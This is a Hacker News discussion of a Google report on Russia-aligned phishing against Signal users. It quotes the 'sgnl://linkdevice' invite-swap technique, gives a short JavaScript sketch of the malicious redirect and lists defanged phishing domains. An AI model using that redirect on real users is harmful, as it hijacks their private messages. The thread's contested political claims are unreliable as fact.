I think the trouble is that information overload is a bit of a thing in this case. It's information that is 99% of the time useless, except the one time it isn't. But also, to an informed user it's much less of a threat - the threat is anyone you interact with getting compromised.
EDIT: An analytics-based approach would probably be far more useful - popping up a confirmation, for example, if GeoIP shows a device far removed from all the others, which for most people would be true unless they were traveling.
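A crude version of that heuristic (flag a newly linked device whose GeoIP location is far from every existing device) might look like the sketch below; the 500 km threshold and the coordinate records are arbitrary illustrative choices, not anything Signal actually does:

```javascript
// Great-circle distance in km between two {lat, lon} points (haversine).
function haversineKm(a, b) {
  const R = 6371;
  const rad = (d) => (d * Math.PI) / 180;
  const dLat = rad(b.lat - a.lat);
  const dLon = rad(b.lon - a.lon);
  const h =
    Math.sin(dLat / 2) ** 2 +
    Math.cos(rad(a.lat)) * Math.cos(rad(b.lat)) * Math.sin(dLon / 2) ** 2;
  return 2 * R * Math.asin(Math.sqrt(h));
}

// Flag a newly linked device only if it is far from every known device,
// so a traveler near one of their own devices isn't bothered.
function looksSuspicious(newDeviceLoc, knownDeviceLocs, thresholdKm = 500) {
  return knownDeviceLocs.every((loc) => haversineKm(newDeviceLoc, loc) > thresholdKm);
}
```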
Great idea, I'll send you a QR code...
They provided some domains, but not all of them are taken. For example, signal-protect[.]host is available, kropyva[.]site is available, signal-confirm[.]site is registered in Ukraine. Some of them are registered in Russia.
Never trust a country at war—any side. Party A blames B, Party B blames A, but both have their own agenda.
>signal-confirm[.]site is registered in Ukraine
The WHOIS is usually fake, made-up data, so I don't know why you're using that to claim it's registered in Ukraine. Russia is also known to use stolen credentials, SIM cards, etc. from its neighbouring countries, including Ukraine, for things like this.
Then why should I trust the article at all? If WHOIS data is fake and stolen credentials are common (which I don't disagree with), I could register a domain, put your name on it, and make it look like you're behind the phishing. Would that make it true? After all, in war, deception is a legitimate tactic.
I believe you are making a mistake by thinking that since a malicious actor's domain is registered in Ukraine, it automatically must be doing something in the interests of Ukraine, or at least be known to its officials.
Lots of Russian state actors have no problems working from within Ukraine, alas. Add to this purely chaotic criminal actors who will go with the highest bidder, territories temporarily controlled by Russians that have people shuttle to Ukraine and back daily, and it becomes complicated very quickly.
Fair point. Just because a domain is registered in Ukraine doesn't mean it's acting in Ukraine's interests. But that works both ways. If Russian actors can operate from Ukraine, then Ukrainian actors (or others) can also operate from Russia, or at least make it look that way. Cyber attacks originating from Ukraine and targeting Russia aren't uncommon either, which only adds to the complexity of attribution.
The issue isn't just attribution but also affiliation. When similar attacks come from Ukraine targeting Russia, Google stays quiet. I understand that Russia invaded Ukraine, not the other way around, but given the complexity of the conflict, aligning with one side in cyber warfare reporting is a questionable move. At the end of the day, attacks will come from both sides - it's a war, after all.
Edit: when I say 'questionable move', I'm specifically referring to Google. It's unclear what they were trying to achieve with this article, is it a political statement or just a marketing piece showcasing how good GTIG is? Or both?
Ukrainian military are moving from Telegram, which presumably still has some ties to Russia despite the claims. And this is yet another phishing campaign in Ukrainian language that makes use of Ukrainian-registered domains to host fake Signal group invites to make Ukrainian military join and link their devices to an adversary-controlled machine. Who might be behind that attack? Hmm, let me think... I don't know! Probably Ukrainians themselves. Or it might be the US. Might as well be the Martians. We will never know the real truth, after all nobody is to be trusted during the war!
Stop the tiresome FUD please. This war is surprisingly straightforward by the standards of the last century, it's literally out of some decades-old textbook. Let's not drag this discussion here again. If you have specific issues with Google's attribution here, please state them, HN is pretty aware that attribution can be shaky. My only gripe with the article is the clickbait title: nobody says that someone is "targeting e-mail" about e-mail phishing.
> Lots of Russian state actors have no problems working from within Ukraine, alas.
Ex: Viktor Yanukovych, prior to being ousted.
An unregistered domain can still be an IoC especially when found through e.g. payload analysis.
Oceania had always been at war with Eastasia.
"Russia-aligned threat"... so... the US?
> In each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., "sgnl://linkdevice?uuid="), tricking victims into linking their Signal accounts to a device controlled by UNC5792.
Missing from their recommendations: install NoScript: https://noscript.net/
NoScript is a browser extension. Signal is an Android/iOS/Electron app, so no.
In each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., "sgnl://linkdevice?uuid="), tricking victims into linking their Signal accounts to a device controlled by UNC5792.
Source: https://cloud.google.com/blog/topics/threat-intelligence/rus...
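To sketch what that quote describes: a legitimate invite page ends in a redirect to a Signal group link, while the phishing page swaps in the device-linking URI scheme. The `sgnl://linkdevice?uuid=` scheme comes from the report; the function names and uuid value here are hypothetical:

```javascript
// What a legitimate group-invite page ultimately redirects to.
function benignInviteRedirect(groupId) {
  return `https://signal.group/#${groupId}`;
}

// The swap the report describes: the same-looking page instead opens the
// device-linking URI, asking the victim's app to begin linking a new
// (attacker-controlled) device rather than joining a group.
function maliciousInviteRedirect(attackerProvisioningUuid) {
  return `sgnl://linkdevice?uuid=${encodeURIComponent(attackerProvisioningUuid)}`;
}
```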
They should add an option to not allow linking additional devices, if that’s feasible.
> Android supports alphanumeric passwords, which offer significantly more security than numeric-only PINs or patterns.
Ironic, coming from Google, as Android is THE one OS where using an alphanumeric password is nearly impossible: it caps password length at an arbitrary 16 characters, preventing the use of passphrases.
Kind of a good sign for signal's security that this is the best Russia has got!
I wouldn’t assume that but I also wouldn’t recommend against using Signal.
That we know of
Yeah, this just gave me the last nudge I needed to give Signal a go.
Last week it was Microsoft, now Signal, who’s next?
https://www.microsoft.com/en-us/security/blog/2025/02/13/sto...
I hate to break it to you, but threat actors aligned with any major state are targeting everything with an Internet presence all of the time.
Am I reading this right? You can initiate device linking in Signal by clicking on an external URL? This is so stupid, I don't even have words for this. In a security-focused app you should not be able to link anything, without manually going into the devices/link menu and clicking "link new device".
Can't view the article, as I am an evil Tor user.
Me too, but I was able to access the article through the Internet Archive:
https://web.archive.org/web/20250219202428/https://cloud.goo...
“Russia's re-invasion of Ukraine”
Reading this for the first time, what is a “re-invasion”? Do they mean the explained cyber attack as second invasion aka “re-invasion”?
Invasion of Crimea 2014
Re-invasion in February 2022
Signal should be doing something well.
Phone verification is a common method used here.
If, somehow, the victim's phone provider can be compromised or coerced into cooperating, the government actor can intercept the text message Signal and others use for verification and set up the victim's account on a new device.
It's very easily done if the victim is located in an authoritarian country like Russia or Iran; they can simply force the local phone provider to cooperate.
> government actor can intercept the text message Signal and others use for verification and set up the victims account on a new device
Yes, but if they only control the phone number, they will register a new account (with different cryptographic keys) for you, which is why everyone previously chatting with you will get that "Your Safety Number with Bob changed" message.
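That warning is trust-on-first-use in action: clients pin a contact's identity key and compare it on later messages, so a re-registration with a fresh key trips the check. A simplified model of the mechanism, not Signal's actual implementation:

```javascript
// Pin a contact's identity key on first contact; on later contact, compare.
// A re-registered account advertises a new key, so every prior chat partner
// sees the "safety number changed" state.
function checkIdentity(pinnedKeys, contactId, advertisedKeyHex) {
  const pinned = pinnedKeys.get(contactId);
  if (pinned === undefined) {
    pinnedKeys.set(contactId, advertisedKeyHex); // trust on first use
    return "first-use";
  }
  return pinned === advertisedKeyHex ? "ok" : "safety-number-changed";
}
```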
that's nice they provided a list of bad domains
Honestly don't use Signal for privacy or anonymity. I switched to it because it is not owned by a sycophant of Trump.
Oh how Americans make fun of the CCP but watching all the tech bros bend the knee was embarrassing.
"Russia-aligned threat actors" has a whole new meaning this last week.
I wonder if someone in the US will declare that, actually, Signal is actively targeting the Russia-aligned threat actors.
Or that Signal shouldn't have started it in the first place
Indeed. It now potentially includes a very long list of Americans.
What does that mean?
Trump and his voters.
Not sure why hating Russia should be treated as axiomatic.
tldr: they mostly use phishing with fake Ukrainian army group invites to trick people (from the Ukrainian army) into linking their phone to an attacker-controlled PC.
Also they try to get the actual database SQL files from Windows devices and Android devices.
I'd love to have more of my socializing happening on Signal. Anyone got a good way to convince the non-paranoid to use it?
"Sorry, I only use Signal" has worked nearly a decade for me
Virtue Signalling!
Which is bad, how?
It's a joke, because virtue signaling (or whatever name you want to give it) is bad, but Signal the messenger app is good so it's a play on words.
It’s not bad. It just IS.
The only people who think it is bad are people who have a different opinion and feel attacked for whatever reason. I find it telling when people accuse others of virtue signaling, because it is almost always someone who is jealous or insecure attacking said signaler.
"Virtue signaling" in theory means "talking the talk without walking the walk", but it's generally thrown out by people who make no effort to assess whether the person criticized is walking the walk or even in contradiction of such evidence.
Driving an economically efficient car -- choosing any sort of car -- has enormous consequences for one's life, for example. Choosing to buy a particular car isn't a decision made lightly. But Prius drivers back in the day were accused of virtue signaling, as though the Prius were equivalent to a temporary tattoo.
In fact, speaking of temporary tattoos, simply having a bumper sticker advocating for animal rights, say, belief in anthropogenic climate change, or peace in the Middle East will expose one to regular displays of hostility and aggression, so it isn't a cheap signal.
In other words, in my experience your observation is spot on.
> "Virtue signaling" in theory means "talking the talk without walking the walk"
Virtue signaling means sending deliberate signals about your virtues, whether you "walk the walk" or not. People are often critiqued for going to uncomfortable lengths to signal their virtues, but something as simple as a "meat is murder" shirt or a MAGA hat is also virtue signaling.
What if you need to contact someone and they use whatsapp?
What if they want to contact you and you use Signal?
Luckily, with the technological advances in the last months, it is now possible to install more than one app on a phone at a time.
It is also possible to communicate without using Meta services.
Good luck with that depending on where you live.
And when you live. The 20s-30s-year-old crowd I interact with seems to avoid, if not mock, FB. I recognize it has its uses and benefits, though.
They mock fb whilst they use instagram and WhatsApp.
> it is now possible to install more than one app on a phone at a time.
And, in doing so, achieve the security posture of the worse of the apps!
IME you say “Sorry I only use Signal” and either they change or you don’t get in contact with that person.
If you change and abandon your principles were they really principles in the first place?
How do you tell them that in the first place? You got someone's phone number, and the person who gave it to you says they use WhatsApp. You can't even tell them "Sorry, I only use Signal" unless you open the WhatsApp app.
You realise you could use that phone number to...call them and let them know? Also - in what situation are they giving you a phone number and telling you they use WhatsApp but you having no way to respond when receiving that info? If it's in person you can explain at the time. If it's taken from a website, call them. Or you can even fall back on SMS.
Presumably at the time they've given you their phone number, they've told you that they are on WhatsApp, and then you've responded directly that you're only on Signal.
If there is a communications channel by which they can give you their phone number, you can use that same channel to discuss what messenger to use.
If they can't reach you via whatsapp, they will call you.
Not GP - I tolerate Whatsapp but I draw the line at SMS.
For me it's the other way around: I tolerate SMS but I draw the line at Whatsapp.
Sounds like someone who never had to pay for each SMS.
RCS?
If you really really really need to? You use Whatsapp.
If you don't need to? You tell them to get Signal.
You call them. Or use SMS. Or use e-mail.
same
Take time with the people to do the boring stuff on their phone/computer:
- install [the thing]
- start it, show how it works
- search for yourself, start a convo, exchange messages
- add them to the group
IME the friction comes from the first step, because it's an annoyance no one cares enough to get past; if you take it on yourself and do it for them, they'll appreciate that.
I usually tell people, "It's like iMessage, but it works on iPhone and Android," or "Hey, if you download Signal we can send high-quality photos between Android and iPhone."
My (non-technical) Mom actually got my whole extended family on Signal with a group link. Since there's no real account creation it was painless. It's how we do all video calls/photo sharing/chat now.
I helped an especially non-technical user install Signal and they didn't need my help at all. They were using it in a minute - download from the app store, transcribe a code from a text message, and you're in - and it worked just like legacy text and phone.
I'd tell them that - just download it and you'll be texting me in a minute, and now nobody is tracking everyone you talk to.
To be clear, someone will/can track WHO you talk to. Right?
My understanding is that they can/do on WhatsApp.
On Signal, unless there is some bug or outright fraud, AFAIK they cannot - that is one of their fundamental goals, and they did a lot of work to develop communication technology that works without revealing that metadata.
(Of course, if someone gets access to your phone, then they know who you are talking to.)
That kind of metadata is not stored by Signal as far as I know. But yes, the data streams between two endpoints can still be correlated to show they are communicating with each other.
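To make the metadata point above concrete: one technique Signal describes for hiding sender metadata is "sealed sender", where the sender's identity travels inside the encrypted payload, so the routing server only ever learns the recipient. Here is a toy, stdlib-only sketch of that idea - the envelope layout and the `toy_encrypt` stand-in are illustrative inventions, not Signal's real wire format or cryptography:

```python
# Toy illustration of the "sealed sender" idea: the sender's identity
# rides inside the ciphertext, so the server routing the message only
# ever sees the recipient. NOT Signal's actual protocol or format.
import hashlib
import json
import os


def toy_encrypt(key: bytes, data: bytes) -> bytes:
    # Stand-in for real AEAD encryption: XOR with a hash-derived
    # keystream. Symmetric, so the same call also decrypts.
    stream = b""
    counter = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def seal(sender: str, recipient: str, body: str, shared_key: bytes) -> dict:
    # The "from" field only exists inside the encrypted inner message.
    inner = json.dumps({"from": sender, "body": body}).encode()
    return {
        "to": recipient,                                     # server-visible
        "ciphertext": toy_encrypt(shared_key, inner).hex(),  # opaque blob
    }


key = os.urandom(32)
envelope = seal("alice", "bob", "hi!", key)

# The server sees only the recipient, never the sender:
assert set(envelope) == {"to", "ciphertext"}

# The recipient, holding the key, recovers the sender and body:
inner = json.loads(toy_encrypt(key, bytes.fromhex(envelope["ciphertext"])))
assert inner["from"] == "alice" and inner["body"] == "hi!"
```

Even with this, an observer who can watch the network itself can still correlate traffic timing between endpoints, which is the caveat in the comment above.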
I've still got Signal installed, but never use it, I only ever ended up chatting on it with a few ex-colleagues, who were fellow devs / nerds.
I have so many WhatsApp group chats (here in Australia) that are critical for me these days, and that I don't control, and that have way too many people, and way too diverse a range of people, for me to have any hope whatsoever of migrating them all to Signal. School parents group chats (one for each class that my kids are in). Strata (aka Home Owners Association) committee group chat. Scouts group chat. Various friends groups chats. Boycotting WhatsApp is not an option for me, it would literally make me unable to function in a number of my day-to-day responsibilities.
Group stories are great fun and a feature I seriously miss on Whatsapp. They work well from meme chats to family groups.
There being a killer feature that Whatsapp users are missing out on won't convince everyone but it sure makes me feel less like a nerd when encouraging the switch to Signal.
I find it quite funny that such an obvious feature likely hasn't been added to Whatsapp yet because Meta thinks Instagram is for stories. That's pure speculation on my part though
I've had good luck just asking for it, even with group chats (though admittedly my friends are mostly technical and more privacy conscious than the average person). Usually it's a switch from FB Messenger and I just say that I don't want to be locked into Facebook anymore.
Just explain what end to end encryption means. People are starting to get it and don’t want companies able to read their messages.
Isn’t WhatsApp end-to-end encrypted?
Yes it is, they actually use the Signal Protocol,[0] but they collect metadata, which Signal supposedly doesn't (you can't really know).
[0] https://en.wikipedia.org/wiki/Signal_Protocol#:~:text=Severa...
Signal doesn't collect that data, but you have no reason to trust me on it.
Look at what data they can provide to governments when compelled by law: https://signal.org/bigbrother/
I thought they recorded the metadata - who talks to who and when. (For the uninitiated, that is as valuable or more valuable than the message contents.)
you also send them your contacts in plaintext so you can find who's also on WhatsApp; signal doesn't
https://www.reddit.com/r/privacy/comments/v7tsou/is_whatsapp...
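Worth noting why simply hashing the uploaded contacts (a common "fix" for the plaintext upload above) wouldn't help much: the phone-number space is tiny by cryptographic standards, so a server can precompute hashes for every possible number and invert the upload. A minimal sketch, using a toy-sized number range purely for illustration:

```python
# Why hashed phone numbers don't protect a contact list: the server can
# brute-force the small number space and invert the hashes.
import hashlib


def anonymize(number: str) -> str:
    # Naive "anonymization": a bare SHA-256 of the phone number.
    return hashlib.sha256(number.encode()).hexdigest()


# The client uploads hashed contacts instead of plaintext numbers.
uploaded = [anonymize("+15551234567")]

# The server precomputes hashes for the whole (toy-sized here) number
# space, then looks up each uploaded hash.
rainbow = {
    anonymize(f"+1555123{i:04d}"): f"+1555123{i:04d}"
    for i in range(10_000)
}
recovered = [rainbow[h] for h in uploaded if h in rainbow]
assert recovered == ["+15551234567"]
```

This is why Signal's contact discovery doesn't rely on plain hashing; they have written about running the lookup inside a secure enclave so the service itself can't retain the queried numbers.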
It seems to be but there is more to it than that.
Nobody cares about this unless they deal drugs or something.
What some people care about is not giving all their private conversations to masculine energy zuck - but don't expect any major wins.
An awfully shortsighted and uninformed viewpoint that has been beaten into the ground ad nauseam.
Read a couple books. Privacy is a precondition to democracy.
It isn't a viewpoint. It's a fact. I've been using Signal for almost a decade now and have only managed to get a dozen or so people to use it in any capacity. Most keep using WhatsApp as their primary method of communication anyway.
Meanwhile, I have been using Signal since the TextSecure days, too, and practically all my contacts are using it these days.
Good for you, tell us how you did it!
What books would you recommend that prove that connection?
"Privacy is a precondition to democracy"
How would you convert an autocracy into a democracy without secrecy? There are no peaceful means, so you have to plot.
Secrecy and privacy are not really the same concept.
>Read a couple books
Maybe you should? It might help improve your reading comprehension. The person you're responding to said that most normal people don't care enough to switch to a vastly less popular app, which is obviously true.
My Signal experience: ex gf in college asks what app I’m using to text. Tell her it’s Signal, E2EE, messages are only stored on her phone and nobody else can read them. She says cool and downloads the app. Four months later her phone breaks.
“Hey subjectsigma I got my new phone today. Where are all my messages?”
“… Do you have your old phone? That’s the only place they are.”
“No? Last time I got a new phone WhatsApp moved my messages over, and WA is E2EE so I thought it worked the same way.”
“Nope if you don’t have a backup or your old phone they’re gone. Sorry.”
“This is bullshit. Why does anyone use Signal. I can’t believe it deleted all my messages. I’m uninstalling it. Etc etc.”
We have a long way to go, my friend.
It only works for WhatsApp if you have Backup to Google activated.[1] I once tried to work with backed-up files from my old phone and it didn't work. (Older tutorials indicated that it once did, though.)
[1] There was a time WhatsApp had a nag-screen if you didn't have Backup to Google activated. So I guess most people would have eventually caved.
That nag-screen is still there, it pops up roughly every three months for me (though not on my primary phone, Whatsapp won't get anywhere near that one).
Russia fucking up the world's stuff this decade will be material for the history books. They are actively breaking Europe and almost no one seems to care.
Second will be how the internet, with social media like Twitter/X, destroyed our democracy.
If Europe is what it claims to be - an enlightened democracy with a progressive, intelligent populace - it cannot be broken by demented crap messages from Twitter.
If, however, it is fucked up and on the brink of collapse, then sure, a little nudge can steer it in the "right" direction. But then who is guilty in the first place?
You should read up on how Russian money buys influence, e.g. in Moldova.
the idea that propaganda doesn't work is certainly an interesting one.
That's part of the propaganda. Please ignore the Internet Research Agency's massive army of troll farms and bots. Please ignore that they controlled half of the largest American Facebook groups catering to racial identity or religion. Nothing to see and no impact.
Impossible these are our newly minted allies
Ok I laughed! :) But it's crazy if you think about it, isn't it?
New allies, same as the old allies.
So a few days ago Elon Musk blocked all links to Signal from the X platform and now this... Could be a coincidence but the timing sure is sus.
I'm not going to psychoanalyse the brain parasite, but I imagine that the reason to do it could be as petty as shadow banning people with Fediverse (e.g. mastodon) handles in their bios shortly after he took over.
Also:
> Signal has been a primary method of communication for federal workers looking to blow the whistle on DOGE.
From https://www.disruptionist.com/p/elon-musks-x-blocks-links-to...
Btw, I don't live in the US but I sketched a simple tool to prevent X from censoring Signal.me links: https://link-in-a-box.vercel.app
Only signal.me links were blocked as far as I understood. Other signal links kept working. (I have no first hand knowledge as I left Twitter when the owner changed)
Unrelated most likely, signal.me is a legitimate domain used by Signal. Doubt twitter is so on top of Threat Analysis when they fumbled their own redirects from twitter.com to x.com for a while.
Not really: the domain block was reportedly due to increased spam activity from that domain and was performed automatically, so it would follow that a write-up would come a few days later. That is, if they are related at all, which is not a given.
Musk calls everything he doesn't like "spam", so of course it was.
It's still a social media platform; not every action taken is some nebulous part of Musk's agenda. Odds are there was an influx of posts from the signal.me domain that an automatic system marked as spam, because they were spam. Suggesting otherwise is baseless speculation.
Given that Musk has deliberately blocked links to whole other domains before for extremely petty reasons, I don't see why we should give him the benefit of the doubt.
>So a few days ago Elon Musk blocked all links to Signal from the X platform and now this... Could be a coincidence but the timing sure is sus.
Not surprising considering Russian Oligarchs enabled Musk's takeover of Twitter:
https://www.dw.com/en/what-do-xs-alleged-ties-to-russian-oli...
Alphabet is working in tandem with the Ukrainian SBU? Interesting choice, just as the US President has called Zelensky a dictator (and for good reason, Poroshenko, the previous Ukrainian president, has basically said the same thing a few days ago). I wonder how long the Alphabet higher-ups will allow this thing to unfold, or maybe they're not so good at reading the geopolitical tea leaves.
> US President has called Zelensky a dictator (and for good reason, Poroshenko, the previous Ukrainian president, has basically said the same thing a few days ago)
You can't be serious that you consider that good enough reasoning.
Zelensky's support / approval rating is well over 50% (according to polls). Zelensky defeated Poroshenko, getting 73% of the vote in the 2019 election.
> Zelensky defeated Poroshenko
And yet he still felt the need to start politically repressing Poroshenko with sanctions and branding him a traitor, that's the mark of having a dictator in command of things.
Maybe because Poroshenko is an oligarch and a piece of shit?
Still a former elected president, isn't he?
They're calling Zelensky a dictator because his term was originally scheduled to end in 2024 unless re-elected, and there were no elections since the beginning of the war.
The problem with this assertion is that Ukraine has "no elections under martial law" written into the law. Zelensky himself actually wanted to do some kind of election to reinforce his mandate while his support was still very high, but there was serious concern from the liberals about those plans on the basis that any election held under martial law, with large numbers of people mobilized to fight, 20% of the country occupied, and many millions of refugees unable to vote, would hardly be free and fair. Their pushback scuttled any plans for the parliament to amend said law.
Why are you repeating Kremlin's talking points?
Using the exact same reasoning, Churchill would be a dictator, too.
Highly likely...
Is this why twitter has been blocking signal.me links? https://news.ycombinator.com/item?id=43076710
State-aligned, huh? This is the US State Department talking point equivalent of a movie poster that brags, "From the studio that brought you..."